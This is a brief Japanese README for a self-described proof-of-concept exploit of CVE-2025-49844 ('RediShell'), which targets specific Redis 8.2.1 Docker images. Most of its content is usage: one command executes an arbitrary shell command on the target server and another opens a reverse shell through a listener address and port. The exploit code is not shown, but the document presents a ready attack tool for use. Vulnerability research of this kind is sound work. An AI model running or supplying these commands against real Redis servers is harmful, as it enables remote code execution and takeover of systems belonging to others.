
CVE-2025-49844 の概念実証
これは CVE-2025-49844 の個人的な proof-of-concept であり、RediShell としても知られています。
対応ターゲットビルド:
redis:8.2.1-alpine Docker イメージredis:8.2.1-bookworm Docker イメージ少し不格好で、Wiz Research のものほど良くはないかもしれません。それでも、Hexacon 2025 のトークがアップロードされる前に動かせたのは嬉しいですし、調査はとても楽しかったです。
単方向シェルコマンドを実行:
$ uv run cve-2025-49844 command "echo 'hello world' > /data/hello.txt"
リバースシェルに接続:
$ uv run cve-2025-49844 rshell -l 127.0.0.1 -p 4444